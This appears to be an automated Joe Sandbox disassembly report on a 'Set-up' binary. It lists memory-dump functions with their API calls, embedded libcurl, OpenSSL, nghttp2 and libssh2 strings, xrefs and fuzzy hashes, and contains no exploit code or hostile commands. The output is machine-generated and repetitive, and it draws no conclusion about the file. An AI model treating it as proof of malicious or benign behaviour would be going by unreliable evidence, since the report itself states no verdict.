Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$users/e_capi.c$users/e_capi_err.c
API String ID: 3049598375-4146664032
Opcode ID: 435fdbf65091bbbf3d03969ac0a8287426ca6b731ffd6af6fc51bc4d7184a46b
Instruction ID: b571e569a515527565a34e5282c3a335f3b44a6c5eeba323deaa9b0744e39007
Opcode Fuzzy Hash: 435fdbf65091bbbf3d03969ac0a8287426ca6b731ffd6af6fc51bc4d7184a46b
Instruction Fuzzy Hash: 40212376B547053BE2213670BC07F2B3658EB41B05F000035BA28E83C3E7DE89685766

Function 00200762 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 377stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00200794

Part of subcall function 002BF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,002000B0,?,?,00000000,00000000,?), ref: 002BF35D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0020356E

Strings

ssh error, xrefs: 0020470D, 00204718
Creating the dir/file failed: %s, xrefs: 00203875
Failed to read data, xrefs: 00204CD7
Bad file size (%lld), xrefs: 00204D42
Upload failed: %s (%lu/%d), xrefs: 00204719
Could not seek stream, xrefs: 00204D26
Unknown error in libssh2, xrefs: 0020386C, 00203874

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
API String ID: 2413861649-3110757985
Opcode ID: 68e767728f5d2d9e5974bb5082dbf5e95ca80028f0da3ac1df99f3ab08282315
Instruction ID: e4eb2ec3d4003d5fe2105721f9d3e420c949c8bc200a10187faac557f35e6238
Opcode Fuzzy Hash: 68e767728f5d2d9e5974bb5082dbf5e95ca80028f0da3ac1df99f3ab08282315
Instruction Fuzzy Hash: 77E1E6B1A247019FD315DF28C885B6AB7E9BF84300F14857CFA598B392DB71AE14CB91

Function 0033A1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003AB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,003B7667,OPENSSL_MODULES), ref: 003AB4CA
Part of subcall function 003AB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,003B7667,OPENSSL_MODULES), ref: 003AB4D4
Part of subcall function 003AB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,003B7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,003B7667,OPENSSL_MODULES), ref: 003AB53B
Part of subcall function 003AB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,003B7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,003B7667,OPENSSL_MODULES), ref: 003AB5A1
Part of subcall function 003AB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,003B7667,OPENSSL_MODULES), ref: 003AB5B4
Part of subcall function 003AB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,003B7667,OPENSSL_MODULES), ref: 003AB648
Part of subcall function 003AB4B0: WideCharToMultiByte.KERNEL32 ref: 003AB67F

Part of subcall function 003AB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(003B7667,?,?,00000000,00000000,00000000,?,003B7667,OPENSSL_MODULES), ref: 003AB504

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0033A1F0
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0033A20B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0033A25D

Strings

OSSL_QFILTER, xrefs: 0033A1CA
server, xrefs: 0033A2E7, 0033A2EF
_%s.sqlog, xrefs: 0033A2F0
client, xrefs: 0033A2E2
%02x, xrefs: 0033A29F
QLOGDIR, xrefs: 0033A1BB
ssl/quic/qlog.c, xrefs: 0033A23E, 0033A375, 0033A38C

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
API String ID: 2744062652-2540125403
Opcode ID: 178d8a179a182e9ca1946013a3b84aedd5caaaa912015008b8315475c5417408
Instruction ID: 6f1a8feae64e5aff283b2c25514868dceb82b0ced03139a024953f40cde0dda7
Opcode Fuzzy Hash: 178d8a179a182e9ca1946013a3b84aedd5caaaa912015008b8315475c5417408
Instruction Fuzzy Hash: 535105A5E047586FE7126A245C86B3B7ADCAF91705F090438FCC9DB283F669ED148363

Function 001F27E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001F284C

Strings

No valid port number in connect to host string (%s), xrefs: 001F2C4B
url.c, xrefs: 001F2863, 001F28B0, 001F2CF9, 001F2DDE
Please URL encode %% as %%25, see RFC 6874., xrefs: 001F29E3
Alt-svc connecting from [%s]%s:%d to [%s]%s:%d, xrefs: 001F2DA3
%s%s%s, xrefs: 001F2834

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
API String ID: 39653677-4104037097
Opcode ID: e14317f8e0dcb78fe595699db53cecf455ef2f27bcee0e58d1ea67e6824f73cc
Instruction ID: a724bae0bd1c5f3e19ff411ff2c018c0b18c98c530016afe1c7a6f353ec637db
Opcode Fuzzy Hash: e14317f8e0dcb78fe595699db53cecf455ef2f27bcee0e58d1ea67e6824f73cc
Instruction Fuzzy Hash: E1A151B06043086FDB289E24C855B7A7BD6AF81314F18447DFE898B393E7369C52C792

Function 0027A5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 0027A5FC
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 0027A698
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0027A6BF
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 0027A6EB
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 0027A700

Strings

nghttp3_ksl.c, xrefs: 0027A6E1, 0027A6F6
i + 1 < blk->n, xrefs: 0027A6E6
lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK, xrefs: 0027A6FB

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assertmemcpy$memmove
String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
API String ID: 3463011695-2629231663
Opcode ID: 60e064ea8d4d130be232bf1447b11b745b152bb2a65a53f13aa0752865b2b531
Instruction ID: d9b581c548a84afbf0a0d7ab0870d4431c7ce4352743523fc5b661e9f1d6c6c2
Opcode Fuzzy Hash: 60e064ea8d4d130be232bf1447b11b745b152bb2a65a53f13aa0752865b2b531
Instruction Fuzzy Hash: ED418D756043059FCB08DF18D88586AB7EAFFD8314F08C92DE8898B342E670EC11CB92

Function 00412480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00412491
CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 004124C6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040F5B4), ref: 00412529

Strings

users/e_capi.c, xrefs: 004124A6, 0041251C, 00412559
users/e_capi_err.c, xrefs: 004124F6
ERR_CAPI_error, xrefs: 004124EF
Error code= 0x, xrefs: 00412545
%lX, xrefs: 00412534

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: CertCertificateContextProperty$ErrorLast
String ID: %lX$ERR_CAPI_error$Error code= 0x$users/e_capi.c$users/e_capi_err.c
API String ID: 2217977984-837018288
Opcode ID: 21867b35ce4305d64df4ff6285febf5e25ae5a421ca6bd29e9eeca2f23ed5a41
Instruction ID: 217d1968b08b0c4236eae620ea542b15885b37950afbafe7a88da864d33de0b3
Opcode Fuzzy Hash: 21867b35ce4305d64df4ff6285febf5e25ae5a421ca6bd29e9eeca2f23ed5a41
Instruction Fuzzy Hash: E211B2BAB9430577F2203270BC47F2B3A49EB11B49F001061BA18A83C3F7DA99645766

Function 0025A340 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)),nghttp2_session.c,0000034E), ref: 0025A377
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri_spec->stream_id != stream->stream_id,nghttp2_session.c,0000034F), ref: 0025A507
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(dep_stream,nghttp2_session.c,00000377), ref: 0025A51C

Strings

nghttp2_session.c, xrefs: 0025A36D, 0025A4FD, 0025A512
(!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session)), xrefs: 0025A372
pri_spec->stream_id != stream->stream_id, xrefs: 0025A502
dep_stream, xrefs: 0025A517

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (!session->server && session->pending_no_rfc7540_priorities != 1) || (session->server && !session_no_rfc7540_pri_no_fallback(session))$dep_stream$nghttp2_session.c$pri_spec->stream_id != stream->stream_id
API String ID: 1222420520-1552295562
Opcode ID: 3543b2d718d7ff72726e72344a0d031a8b07792df1af0de6de6d84066e958c3e
Instruction ID: eceba67971321ea4a9710fc1dc068ae40cbaf6b38cc802dc556109cc37fd99a8
Opcode Fuzzy Hash: 3543b2d718d7ff72726e72344a0d031a8b07792df1af0de6de6d84066e958c3e
Instruction Fuzzy Hash: DEA17D709243866FDF219F309C47BAA7BE46F41306F084529EC8986282E775E978CB57

Function 00222430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00222666
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00222699
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 002226FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0022273A

Strings

Shuffling %i addresses, xrefs: 002224A6
:%u, xrefs: 002226CC
hostip.c, xrefs: 002224B4, 0022253F, 00222613, 00222626, 00222673, 0022276D, 002227AF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: :%u$Shuffling %i addresses$hostip.c
API String ID: 2198566249-1766712111
Opcode ID: 53cf9580caa59f8452504807554ee0783b4968e1291044d8c0744f6b0c6d1d04
Instruction ID: 8caf21478b13ea06225d57dd8bcb569e5ace61a8a02608a691cd1b9515205817
Opcode Fuzzy Hash: 53cf9580caa59f8452504807554ee0783b4968e1291044d8c0744f6b0c6d1d04
Instruction Fuzzy Hash: 56A1E475A14301ABD734DF58E845BA7B7E5FF94300F08852DED8987382E736E925CA81

Function 001D230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D2359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D2465
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D24AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D23EE

Part of subcall function 001D1A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001D1A70

Strings

, xrefs: 001D2367
, xrefs: 001D234B
, xrefs: 001D234F
Memory allocation failed for decrypted data., xrefs: 001D2411

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: free$abortmallocstrlen
String ID: $ $ $Memory allocation failed for decrypted data.
API String ID: 673139954-1317699236
Opcode ID: 77d5717ea4b51604e6c330ece89d9828ad9461d7de5cf216831cadd1849ac49a
Instruction ID: f2186e5bcbbe7b1f981d4ee933f12c64eae0e9799916187f8a393fc6de6fc520
Opcode Fuzzy Hash: 77d5717ea4b51604e6c330ece89d9828ad9461d7de5cf216831cadd1849ac49a
Instruction Fuzzy Hash: 2B5163B49047099FCB04EFA9C48599EBBF0FF98310F11895AE8989B315E774E9448F92

Function 001E6330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 001ED8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001E01B1), ref: 001ED8E2

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0021420E,?,?), ref: 001E6350
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(0021420E,?,?,?,?,?,?,?,?,?,0021420E,?,?), ref: 001E635B
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 001E6369
Sleep.KERNEL32(00000001), ref: 001E63B2
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 001E63BC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0021420E,?,?), ref: 001E63C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0021420E,?,?), ref: 001E63D6

Part of subcall function 001ED8C0: GetTickCount.KERNEL32 ref: 001ED968

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 001E63ED

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: ec7c30cf0b5469f5f619bdccbfeac0b9c5af86f34b5a8e69e41470d0e37a33a1
Instruction ID: 4535c11ddb9ebb1a54eac3d27ea4f461207aa0b3ad64564d00e15d83962d0707
Opcode Fuzzy Hash: ec7c30cf0b5469f5f619bdccbfeac0b9c5af86f34b5a8e69e41470d0e37a33a1
Instruction Fuzzy Hash: 841108A6C00A8157E71166256C46FBF7768BFF5764F490225FC4C62243FB21DA988293

Function 00228200 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 340stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A,?), ref: 00228290
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00228313

Strings

HTTP/, xrefs: 00228354, 0022859F
RTSP/, xrefs: 0022837A, 002285EC
Received HTTP/0.9 when not allowed, xrefs: 00228513, 00228640
Invalid status line, xrefs: 002284F1, 00228625, 00228645

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

